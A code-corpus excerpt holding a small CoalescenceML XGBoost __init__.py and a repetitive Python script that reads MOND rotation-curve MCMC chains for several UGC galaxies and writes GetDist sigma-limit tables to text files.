"Apache-2.0"
] | 2 | 2022-02-18T18:48:12.000Z | 2022-02-19T18:14:38.000Z | src/coalescenceml/integrations/xgboost/producers/__init__.py | bayoumi17m/CoalescenceML | 0ffa6cc88e6d1d98fe16572e6f509d5d3be09501 | [
"Apache-2.0"
] | 1 | 2022-02-10T02:52:22.000Z | 2022-02-10T02:52:22.000Z | from coalescenceml.integrations.xgboost.producers.xgboost_booster_producer import (
XgboostBoosterProducer,
)
from coalescenceml.integrations.xgboost.producers.xgboost_dmatrix_producer import (
XgboostDMatrixProducer,
)
| 32.571429 | 83 | 0.850877 | 20 | 228 | 9.5 | 0.55 | 0.178947 | 0.305263 | 0.378947 | 0.547368 | 0.547368 | 0 | 0 | 0 | 0 | 0 | 0 | 0.087719 | 228 | 6 | 84 | 38 | 0.913462 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.333333 | 0 | 0.333333 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
9dd5acefbef1f337c40668a4c50864e1479ffcf9 | 102,813 | py | Python | MOND_Python_getDist_levels_5th_30gal_run2.py | alefefreire/Machine-Learning-for-Science | dcf8649db0b38e6c5e0e7c0af0771ee85b31a85d | [
"MIT"
] | null | null | null | MOND_Python_getDist_levels_5th_30gal_run2.py | alefefreire/Machine-Learning-for-Science | dcf8649db0b38e6c5e0e7c0af0771ee85b31a85d | [
"MIT"
] | null | null | null | MOND_Python_getDist_levels_5th_30gal_run2.py | alefefreire/Machine-Learning-for-Science | dcf8649db0b38e6c5e0e7c0af0771ee85b31a85d | [
"MIT"
] | null | null | null | from __future__ import print_function
import numpy
import pandas as pd
import csv
import matplotlib.pyplot as plot
from matplotlib.ticker import MaxNLocator
from scipy.interpolate import interp1d
import scipy.optimize as op
import scipy
from scipy import *
from scipy.special import expi
#import lmfit
#from lmfit import minimize, Minimizer, Parameters, Parameter, report_fit
#import emcee
#from emcee import PTSampler
from matplotlib import rcParams
import time
from scipy.interpolate import InterpolatedUnivariateSpline
import sys
sys.path.insert(0,r'c:\work\dist\git\getdist')
import getdist
from getdist import plots, MCSamples
#import getdist, IPython
import pylab as plt
print('GetDist Version: %s, Matplotlib version: %s'%(getdist.__version__, plt.matplotlib.__version__))
#matplotlib 2 doesn't seem to work well without usetex on
plt.rcParams['text.usetex']=True
labels=[r"$\log_{10} a_0$",r"$\log_{10}\Upsilon_{*d}$",r"$\delta$", r"$\Delta i$"]
labels_with_bulge=[r"$\log_{10} a_0$",r"$\log_{10}\Upsilon_{*d}$",r"$\log_{10}\Upsilon_{*b}$",r"$\delta$", r"$\Delta i$"]
names=["log10_a0","log10_YD","df2","Dinc"]
names_with_bulge=["log10_a0","log10_YD","log10_YB","df2","Dinc"]
ndim=len(labels)
ndim_with_bulge=len(labels_with_bulge)
full_chain_UGC06930 = pd.read_csv('/home/alefe/Cluster/MOND_outputs/chain_UGC06930.csv',usecols=[1,2,3,4])
data_array_chain_UGC06930 = numpy.array(full_chain_UGC06930)
mle_soln_UGC06930=[]
for i in range(ndim):
mcmc_UGC06930 = numpy.percentile(data_array_chain_UGC06930[:, i], [16, 50, 84])
q_UGC06930 = numpy.diff(mcmc_UGC06930)
mle_soln_UGC06930.append(mcmc_UGC06930[1])
log10_a0_sol_UGC06930=mle_soln_UGC06930[0]
log10_YD_sol_UGC06930=mle_soln_UGC06930[1]
df2_sol_UGC06930=mle_soln_UGC06930[2]
Dinc_sol_UGC06930=mle_soln_UGC06930[3]
samp_UGC06930 = getdist.mcsamples.MCSamples(samples=data_array_chain_UGC06930,names = names, labels = labels)
samp_UGC06930.updateSettings({'contours': [0.682689492137086, 0.954499736103642,0.997300203936740,0.999936657516334,0.999999426696856]})
stats_UGC06930 = samp_UGC06930.getMargeStats()
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC06930-sigmatab-log10_a0.txt', 'w')
text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
text_file.close()
for i in range(5):
log10_a0_sol_str='%s'%log10_a0_sol_UGC06930
low=log10_a0_sol_UGC06930-stats_UGC06930.parWithName('log10_a0').limits[i].lower
low_str='%s'%low
up=stats_UGC06930.parWithName('log10_a0').limits[i].upper- log10_a0_sol_UGC06930
up_str='%s'%up
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC06930-sigmatab-log10_a0.txt', 'a')
text_file.write(log10_a0_sol_str + ',' + low_str + ',' + up_str + '\n')
text_file.close()
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC06930-sigmatab-log10_YD.txt', 'w')
text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
text_file.close()
for i in range(5):
log10_YD_sol_str='%s'%log10_YD_sol_UGC06930
low=log10_YD_sol_UGC06930-stats_UGC06930.parWithName('log10_YD').limits[i].lower
low_str='%s'%low
up=stats_UGC06930.parWithName('log10_YD').limits[i].upper- log10_YD_sol_UGC06930
up_str='%s'%up
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC06930-sigmatab-log10_YD.txt', 'a')
text_file.write(log10_YD_sol_str + ',' + low_str + ',' + up_str + '\n')
text_file.close()
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC06930-sigmatab-df2.txt', 'w')
text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
text_file.close()
for i in range(5):
df2_sol_str='%s'%df2_sol_UGC06930
low=df2_sol_UGC06930-stats_UGC06930.parWithName('df2').limits[i].lower
low_str='%s'%low
up=stats_UGC06930.parWithName('df2').limits[i].upper- df2_sol_UGC06930
up_str='%s'%up
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC06930-sigmatab-df2.txt', 'a')
text_file.write(df2_sol_str + ',' + low_str + ',' + up_str + '\n')
text_file.close()
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC06930-sigmatab-Dinc.txt', 'w')
text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
text_file.close()
for i in range(5):
Dinc_sol_str='%s'%Dinc_sol_UGC06930
low=Dinc_sol_UGC06930-stats_UGC06930.parWithName('Dinc').limits[i].lower
low_str='%s'%low
up=stats_UGC06930.parWithName('Dinc').limits[i].upper- Dinc_sol_UGC06930
up_str='%s'%up
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC06930-sigmatab-Dinc.txt', 'a')
text_file.write(Dinc_sol_str + ',' + low_str + ',' + up_str + '\n')
text_file.close()
full_chain_UGC06983 = pd.read_csv('/home/alefe/Cluster/MOND_outputs/chain_UGC06983.csv',usecols=[1,2,3,4])
data_array_chain_UGC06983 = numpy.array(full_chain_UGC06983)
mle_soln_UGC06983=[]
for i in range(ndim):
mcmc_UGC06983 = numpy.percentile(data_array_chain_UGC06983[:, i], [16, 50, 84])
q_UGC06983 = numpy.diff(mcmc_UGC06983)
mle_soln_UGC06983.append(mcmc_UGC06983[1])
log10_a0_sol_UGC06983=mle_soln_UGC06983[0]
log10_YD_sol_UGC06983=mle_soln_UGC06983[1]
df2_sol_UGC06983=mle_soln_UGC06983[2]
Dinc_sol_UGC06983=mle_soln_UGC06983[3]
samp_UGC06983 = getdist.mcsamples.MCSamples(samples=data_array_chain_UGC06983,names = names, labels = labels)
samp_UGC06983.updateSettings({'contours': [0.682689492137086, 0.954499736103642,0.997300203936740,0.999936657516334,0.999999426696856]})
stats_UGC06983 = samp_UGC06983.getMargeStats()
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC06983-sigmatab-log10_a0.txt', 'w')
text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
text_file.close()
for i in range(5):
log10_a0_sol_str='%s'%log10_a0_sol_UGC06983
low=log10_a0_sol_UGC06983-stats_UGC06983.parWithName('log10_a0').limits[i].lower
low_str='%s'%low
up=stats_UGC06983.parWithName('log10_a0').limits[i].upper- log10_a0_sol_UGC06983
up_str='%s'%up
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC06983-sigmatab-log10_a0.txt', 'a')
text_file.write(log10_a0_sol_str + ',' + low_str + ',' + up_str + '\n')
text_file.close()
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC06983-sigmatab-log10_YD.txt', 'w')
text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
text_file.close()
for i in range(5):
log10_YD_sol_str='%s'%log10_YD_sol_UGC06983
low=log10_YD_sol_UGC06983-stats_UGC06983.parWithName('log10_YD').limits[i].lower
low_str='%s'%low
up=stats_UGC06983.parWithName('log10_YD').limits[i].upper- log10_YD_sol_UGC06983
up_str='%s'%up
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC06983-sigmatab-log10_YD.txt', 'a')
text_file.write(log10_YD_sol_str + ',' + low_str + ',' + up_str + '\n')
text_file.close()
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC06983-sigmatab-df2.txt', 'w')
text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
text_file.close()
for i in range(5):
df2_sol_str='%s'%df2_sol_UGC06983
low=df2_sol_UGC06983-stats_UGC06983.parWithName('df2').limits[i].lower
low_str='%s'%low
up=stats_UGC06983.parWithName('df2').limits[i].upper- df2_sol_UGC06983
up_str='%s'%up
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC06983-sigmatab-df2.txt', 'a')
text_file.write(df2_sol_str + ',' + low_str + ',' + up_str + '\n')
text_file.close()
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC06983-sigmatab-Dinc.txt', 'w')
text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
text_file.close()
for i in range(5):
Dinc_sol_str='%s'%Dinc_sol_UGC06983
low=Dinc_sol_UGC06983-stats_UGC06983.parWithName('Dinc').limits[i].lower
low_str='%s'%low
up=stats_UGC06983.parWithName('Dinc').limits[i].upper- Dinc_sol_UGC06983
up_str='%s'%up
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC06983-sigmatab-Dinc.txt', 'a')
text_file.write(Dinc_sol_str + ',' + low_str + ',' + up_str + '\n')
text_file.close()
full_chain_UGC07089 = pd.read_csv('/home/alefe/Cluster/MOND_outputs/chain_UGC07089.csv',usecols=[1,2,3,4])
data_array_chain_UGC07089 = numpy.array(full_chain_UGC07089)
mle_soln_UGC07089=[]
for i in range(ndim):
mcmc_UGC07089 = numpy.percentile(data_array_chain_UGC07089[:, i], [16, 50, 84])
q_UGC07089 = numpy.diff(mcmc_UGC07089)
mle_soln_UGC07089.append(mcmc_UGC07089[1])
log10_a0_sol_UGC07089=mle_soln_UGC07089[0]
log10_YD_sol_UGC07089=mle_soln_UGC07089[1]
df2_sol_UGC07089=mle_soln_UGC07089[2]
Dinc_sol_UGC07089=mle_soln_UGC07089[3]
samp_UGC07089 = getdist.mcsamples.MCSamples(samples=data_array_chain_UGC07089,names = names, labels = labels)
samp_UGC07089.updateSettings({'contours': [0.682689492137086, 0.954499736103642,0.997300203936740,0.999936657516334,0.999999426696856]})
stats_UGC07089 = samp_UGC07089.getMargeStats()
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC07089-sigmatab-log10_a0.txt', 'w')
text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
text_file.close()
for i in range(5):
log10_a0_sol_str='%s'%log10_a0_sol_UGC07089
low=log10_a0_sol_UGC07089-stats_UGC07089.parWithName('log10_a0').limits[i].lower
low_str='%s'%low
up=stats_UGC07089.parWithName('log10_a0').limits[i].upper- log10_a0_sol_UGC07089
up_str='%s'%up
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC07089-sigmatab-log10_a0.txt', 'a')
text_file.write(log10_a0_sol_str + ',' + low_str + ',' + up_str + '\n')
text_file.close()
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC07089-sigmatab-log10_YD.txt', 'w')
text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
text_file.close()
for i in range(5):
log10_YD_sol_str='%s'%log10_YD_sol_UGC07089
low=log10_YD_sol_UGC07089-stats_UGC07089.parWithName('log10_YD').limits[i].lower
low_str='%s'%low
up=stats_UGC07089.parWithName('log10_YD').limits[i].upper- log10_YD_sol_UGC07089
up_str='%s'%up
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC07089-sigmatab-log10_YD.txt', 'a')
text_file.write(log10_YD_sol_str + ',' + low_str + ',' + up_str + '\n')
text_file.close()
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC07089-sigmatab-df2.txt', 'w')
text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
text_file.close()
for i in range(5):
df2_sol_str='%s'%df2_sol_UGC07089
low=df2_sol_UGC07089-stats_UGC07089.parWithName('df2').limits[i].lower
low_str='%s'%low
up=stats_UGC07089.parWithName('df2').limits[i].upper- df2_sol_UGC07089
up_str='%s'%up
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC07089-sigmatab-df2.txt', 'a')
text_file.write(df2_sol_str + ',' + low_str + ',' + up_str + '\n')
text_file.close()
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC07089-sigmatab-Dinc.txt', 'w')
text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
text_file.close()
for i in range(5):
Dinc_sol_str='%s'%Dinc_sol_UGC07089
low=Dinc_sol_UGC07089-stats_UGC07089.parWithName('Dinc').limits[i].lower
low_str='%s'%low
up=stats_UGC07089.parWithName('Dinc').limits[i].upper- Dinc_sol_UGC07089
up_str='%s'%up
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC07089-sigmatab-Dinc.txt', 'a')
text_file.write(Dinc_sol_str + ',' + low_str + ',' + up_str + '\n')
text_file.close()
full_chain_UGC07125 = pd.read_csv('/home/alefe/Cluster/MOND_outputs/chain_UGC07125.csv',usecols=[1,2,3,4])
data_array_chain_UGC07125 = numpy.array(full_chain_UGC07125)
mle_soln_UGC07125=[]
for i in range(ndim):
mcmc_UGC07125 = numpy.percentile(data_array_chain_UGC07125[:, i], [16, 50, 84])
q_UGC07125 = numpy.diff(mcmc_UGC07125)
mle_soln_UGC07125.append(mcmc_UGC07125[1])
log10_a0_sol_UGC07125=mle_soln_UGC07125[0]
log10_YD_sol_UGC07125=mle_soln_UGC07125[1]
df2_sol_UGC07125=mle_soln_UGC07125[2]
Dinc_sol_UGC07125=mle_soln_UGC07125[3]
samp_UGC07125 = getdist.mcsamples.MCSamples(samples=data_array_chain_UGC07125,names = names, labels = labels)
samp_UGC07125.updateSettings({'contours': [0.682689492137086, 0.954499736103642,0.997300203936740,0.999936657516334,0.999999426696856]})
stats_UGC07125 = samp_UGC07125.getMargeStats()
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC07125-sigmatab-log10_a0.txt', 'w')
text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
text_file.close()
for i in range(5):
log10_a0_sol_str='%s'%log10_a0_sol_UGC07125
low=log10_a0_sol_UGC07125-stats_UGC07125.parWithName('log10_a0').limits[i].lower
low_str='%s'%low
up=stats_UGC07125.parWithName('log10_a0').limits[i].upper- log10_a0_sol_UGC07125
up_str='%s'%up
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC07125-sigmatab-log10_a0.txt', 'a')
text_file.write(log10_a0_sol_str + ',' + low_str + ',' + up_str + '\n')
text_file.close()
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC07125-sigmatab-log10_YD.txt', 'w')
text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
text_file.close()
for i in range(5):
log10_YD_sol_str='%s'%log10_YD_sol_UGC07125
low=log10_YD_sol_UGC07125-stats_UGC07125.parWithName('log10_YD').limits[i].lower
low_str='%s'%low
up=stats_UGC07125.parWithName('log10_YD').limits[i].upper- log10_YD_sol_UGC07125
up_str='%s'%up
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC07125-sigmatab-log10_YD.txt', 'a')
text_file.write(log10_YD_sol_str + ',' + low_str + ',' + up_str + '\n')
text_file.close()
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC07125-sigmatab-df2.txt', 'w')
text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
text_file.close()
for i in range(5):
df2_sol_str='%s'%df2_sol_UGC07125
low=df2_sol_UGC07125-stats_UGC07125.parWithName('df2').limits[i].lower
low_str='%s'%low
up=stats_UGC07125.parWithName('df2').limits[i].upper- df2_sol_UGC07125
up_str='%s'%up
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC07125-sigmatab-df2.txt', 'a')
text_file.write(df2_sol_str + ',' + low_str + ',' + up_str + '\n')
text_file.close()
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC07125-sigmatab-Dinc.txt', 'w')
text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
text_file.close()
for i in range(5):
Dinc_sol_str='%s'%Dinc_sol_UGC07125
low=Dinc_sol_UGC07125-stats_UGC07125.parWithName('Dinc').limits[i].lower
low_str='%s'%low
up=stats_UGC07125.parWithName('Dinc').limits[i].upper- Dinc_sol_UGC07125
up_str='%s'%up
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC07125-sigmatab-Dinc.txt', 'a')
text_file.write(Dinc_sol_str + ',' + low_str + ',' + up_str + '\n')
text_file.close()
full_chain_UGC07151 = pd.read_csv('/home/alefe/Cluster/MOND_outputs/chain_UGC07151.csv',usecols=[1,2,3,4])
data_array_chain_UGC07151 = numpy.array(full_chain_UGC07151)
mle_soln_UGC07151=[]
for i in range(ndim):
mcmc_UGC07151 = numpy.percentile(data_array_chain_UGC07151[:, i], [16, 50, 84])
q_UGC07151 = numpy.diff(mcmc_UGC07151)
mle_soln_UGC07151.append(mcmc_UGC07151[1])
log10_a0_sol_UGC07151=mle_soln_UGC07151[0]
log10_YD_sol_UGC07151=mle_soln_UGC07151[1]
df2_sol_UGC07151=mle_soln_UGC07151[2]
Dinc_sol_UGC07151=mle_soln_UGC07151[3]
samp_UGC07151 = getdist.mcsamples.MCSamples(samples=data_array_chain_UGC07151,names = names, labels = labels)
samp_UGC07151.updateSettings({'contours': [0.682689492137086, 0.954499736103642,0.997300203936740,0.999936657516334,0.999999426696856]})
stats_UGC07151 = samp_UGC07151.getMargeStats()
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC07151-sigmatab-log10_a0.txt', 'w')
text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
text_file.close()
for i in range(5):
log10_a0_sol_str='%s'%log10_a0_sol_UGC07151
low=log10_a0_sol_UGC07151-stats_UGC07151.parWithName('log10_a0').limits[i].lower
low_str='%s'%low
up=stats_UGC07151.parWithName('log10_a0').limits[i].upper- log10_a0_sol_UGC07151
up_str='%s'%up
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC07151-sigmatab-log10_a0.txt', 'a')
text_file.write(log10_a0_sol_str + ',' + low_str + ',' + up_str + '\n')
text_file.close()
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC07151-sigmatab-log10_YD.txt', 'w')
text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
text_file.close()
for i in range(5):
log10_YD_sol_str='%s'%log10_YD_sol_UGC07151
low=log10_YD_sol_UGC07151-stats_UGC07151.parWithName('log10_YD').limits[i].lower
low_str='%s'%low
up=stats_UGC07151.parWithName('log10_YD').limits[i].upper- log10_YD_sol_UGC07151
up_str='%s'%up
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC07151-sigmatab-log10_YD.txt', 'a')
text_file.write(log10_YD_sol_str + ',' + low_str + ',' + up_str + '\n')
text_file.close()
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC07151-sigmatab-df2.txt', 'w')
text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
text_file.close()
for i in range(5):
df2_sol_str='%s'%df2_sol_UGC07151
low=df2_sol_UGC07151-stats_UGC07151.parWithName('df2').limits[i].lower
low_str='%s'%low
up=stats_UGC07151.parWithName('df2').limits[i].upper- df2_sol_UGC07151
up_str='%s'%up
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC07151-sigmatab-df2.txt', 'a')
text_file.write(df2_sol_str + ',' + low_str + ',' + up_str + '\n')
text_file.close()
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC07151-sigmatab-Dinc.txt', 'w')
text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
text_file.close()
for i in range(5):
Dinc_sol_str='%s'%Dinc_sol_UGC07151
low=Dinc_sol_UGC07151-stats_UGC07151.parWithName('Dinc').limits[i].lower
low_str='%s'%low
up=stats_UGC07151.parWithName('Dinc').limits[i].upper- Dinc_sol_UGC07151
up_str='%s'%up
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC07151-sigmatab-Dinc.txt', 'a')
text_file.write(Dinc_sol_str + ',' + low_str + ',' + up_str + '\n')
text_file.close()
full_chain_UGC07232 = pd.read_csv('/home/alefe/Cluster/MOND_outputs/chain_UGC07232.csv',usecols=[1,2,3,4])
data_array_chain_UGC07232 = numpy.array(full_chain_UGC07232)
mle_soln_UGC07232=[]
for i in range(ndim):
mcmc_UGC07232 = numpy.percentile(data_array_chain_UGC07232[:, i], [16, 50, 84])
q_UGC07232 = numpy.diff(mcmc_UGC07232)
mle_soln_UGC07232.append(mcmc_UGC07232[1])
log10_a0_sol_UGC07232=mle_soln_UGC07232[0]
log10_YD_sol_UGC07232=mle_soln_UGC07232[1]
df2_sol_UGC07232=mle_soln_UGC07232[2]
Dinc_sol_UGC07232=mle_soln_UGC07232[3]
samp_UGC07232 = getdist.mcsamples.MCSamples(samples=data_array_chain_UGC07232,names = names, labels = labels)
samp_UGC07232.updateSettings({'contours': [0.682689492137086, 0.954499736103642,0.997300203936740,0.999936657516334,0.999999426696856]})
stats_UGC07232 = samp_UGC07232.getMargeStats()
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC07232-sigmatab-log10_a0.txt', 'w')
text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
text_file.close()
for i in range(5):
log10_a0_sol_str='%s'%log10_a0_sol_UGC07232
low=log10_a0_sol_UGC07232-stats_UGC07232.parWithName('log10_a0').limits[i].lower
low_str='%s'%low
up=stats_UGC07232.parWithName('log10_a0').limits[i].upper- log10_a0_sol_UGC07232
up_str='%s'%up
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC07232-sigmatab-log10_a0.txt', 'a')
text_file.write(log10_a0_sol_str + ',' + low_str + ',' + up_str + '\n')
text_file.close()
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC07232-sigmatab-log10_YD.txt', 'w')
text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
text_file.close()
for i in range(5):
log10_YD_sol_str='%s'%log10_YD_sol_UGC07232
low=log10_YD_sol_UGC07232-stats_UGC07232.parWithName('log10_YD').limits[i].lower
low_str='%s'%low
up=stats_UGC07232.parWithName('log10_YD').limits[i].upper- log10_YD_sol_UGC07232
up_str='%s'%up
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC07232-sigmatab-log10_YD.txt', 'a')
text_file.write(log10_YD_sol_str + ',' + low_str + ',' + up_str + '\n')
text_file.close()
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC07232-sigmatab-df2.txt', 'w')
text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
text_file.close()
for i in range(5):
df2_sol_str='%s'%df2_sol_UGC07232
low=df2_sol_UGC07232-stats_UGC07232.parWithName('df2').limits[i].lower
low_str='%s'%low
up=stats_UGC07232.parWithName('df2').limits[i].upper- df2_sol_UGC07232
up_str='%s'%up
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC07232-sigmatab-df2.txt', 'a')
text_file.write(df2_sol_str + ',' + low_str + ',' + up_str + '\n')
text_file.close()
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC07232-sigmatab-Dinc.txt', 'w')
text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
text_file.close()
for i in range(5):
Dinc_sol_str='%s'%Dinc_sol_UGC07232
low=Dinc_sol_UGC07232-stats_UGC07232.parWithName('Dinc').limits[i].lower
low_str='%s'%low
up=stats_UGC07232.parWithName('Dinc').limits[i].upper- Dinc_sol_UGC07232
up_str='%s'%up
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC07232-sigmatab-Dinc.txt', 'a')
text_file.write(Dinc_sol_str + ',' + low_str + ',' + up_str + '\n')
text_file.close()
full_chain_UGC07261 = pd.read_csv('/home/alefe/Cluster/MOND_outputs/chain_UGC07261.csv',usecols=[1,2,3,4])
data_array_chain_UGC07261 = numpy.array(full_chain_UGC07261)
mle_soln_UGC07261=[]
for i in range(ndim):
mcmc_UGC07261 = numpy.percentile(data_array_chain_UGC07261[:, i], [16, 50, 84])
q_UGC07261 = numpy.diff(mcmc_UGC07261)
mle_soln_UGC07261.append(mcmc_UGC07261[1])
log10_a0_sol_UGC07261=mle_soln_UGC07261[0]
log10_YD_sol_UGC07261=mle_soln_UGC07261[1]
df2_sol_UGC07261=mle_soln_UGC07261[2]
Dinc_sol_UGC07261=mle_soln_UGC07261[3]
samp_UGC07261 = getdist.mcsamples.MCSamples(samples=data_array_chain_UGC07261,names = names, labels = labels)
samp_UGC07261.updateSettings({'contours': [0.682689492137086, 0.954499736103642,0.997300203936740,0.999936657516334,0.999999426696856]})
stats_UGC07261 = samp_UGC07261.getMargeStats()
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC07261-sigmatab-log10_a0.txt', 'w')
text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
text_file.close()
for i in range(5):
log10_a0_sol_str='%s'%log10_a0_sol_UGC07261
low=log10_a0_sol_UGC07261-stats_UGC07261.parWithName('log10_a0').limits[i].lower
low_str='%s'%low
up=stats_UGC07261.parWithName('log10_a0').limits[i].upper- log10_a0_sol_UGC07261
up_str='%s'%up
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC07261-sigmatab-log10_a0.txt', 'a')
text_file.write(log10_a0_sol_str + ',' + low_str + ',' + up_str + '\n')
text_file.close()
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC07261-sigmatab-log10_YD.txt', 'w')
text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
text_file.close()
for i in range(5):
log10_YD_sol_str='%s'%log10_YD_sol_UGC07261
low=log10_YD_sol_UGC07261-stats_UGC07261.parWithName('log10_YD').limits[i].lower
low_str='%s'%low
up=stats_UGC07261.parWithName('log10_YD').limits[i].upper- log10_YD_sol_UGC07261
up_str='%s'%up
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC07261-sigmatab-log10_YD.txt', 'a')
text_file.write(log10_YD_sol_str + ',' + low_str + ',' + up_str + '\n')
text_file.close()
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC07261-sigmatab-df2.txt', 'w')
text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
text_file.close()
for i in range(5):
df2_sol_str='%s'%df2_sol_UGC07261
low=df2_sol_UGC07261-stats_UGC07261.parWithName('df2').limits[i].lower
low_str='%s'%low
up=stats_UGC07261.parWithName('df2').limits[i].upper- df2_sol_UGC07261
up_str='%s'%up
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC07261-sigmatab-df2.txt', 'a')
text_file.write(df2_sol_str + ',' + low_str + ',' + up_str + '\n')
text_file.close()
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC07261-sigmatab-Dinc.txt', 'w')
text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
text_file.close()
for i in range(5):
Dinc_sol_str='%s'%Dinc_sol_UGC07261
low=Dinc_sol_UGC07261-stats_UGC07261.parWithName('Dinc').limits[i].lower
low_str='%s'%low
up=stats_UGC07261.parWithName('Dinc').limits[i].upper- Dinc_sol_UGC07261
up_str='%s'%up
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC07261-sigmatab-Dinc.txt', 'a')
text_file.write(Dinc_sol_str + ',' + low_str + ',' + up_str + '\n')
text_file.close()
full_chain_UGC07323 = pd.read_csv('/home/alefe/Cluster/MOND_outputs/chain_UGC07323.csv',usecols=[1,2,3,4])
data_array_chain_UGC07323 = numpy.array(full_chain_UGC07323)
mle_soln_UGC07323=[]
for i in range(ndim):
mcmc_UGC07323 = numpy.percentile(data_array_chain_UGC07323[:, i], [16, 50, 84])
q_UGC07323 = numpy.diff(mcmc_UGC07323)
mle_soln_UGC07323.append(mcmc_UGC07323[1])
log10_a0_sol_UGC07323=mle_soln_UGC07323[0]
log10_YD_sol_UGC07323=mle_soln_UGC07323[1]
df2_sol_UGC07323=mle_soln_UGC07323[2]
Dinc_sol_UGC07323=mle_soln_UGC07323[3]
samp_UGC07323 = getdist.mcsamples.MCSamples(samples=data_array_chain_UGC07323,names = names, labels = labels)
samp_UGC07323.updateSettings({'contours': [0.682689492137086, 0.954499736103642,0.997300203936740,0.999936657516334,0.999999426696856]})
stats_UGC07323 = samp_UGC07323.getMargeStats()
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC07323-sigmatab-log10_a0.txt', 'w')
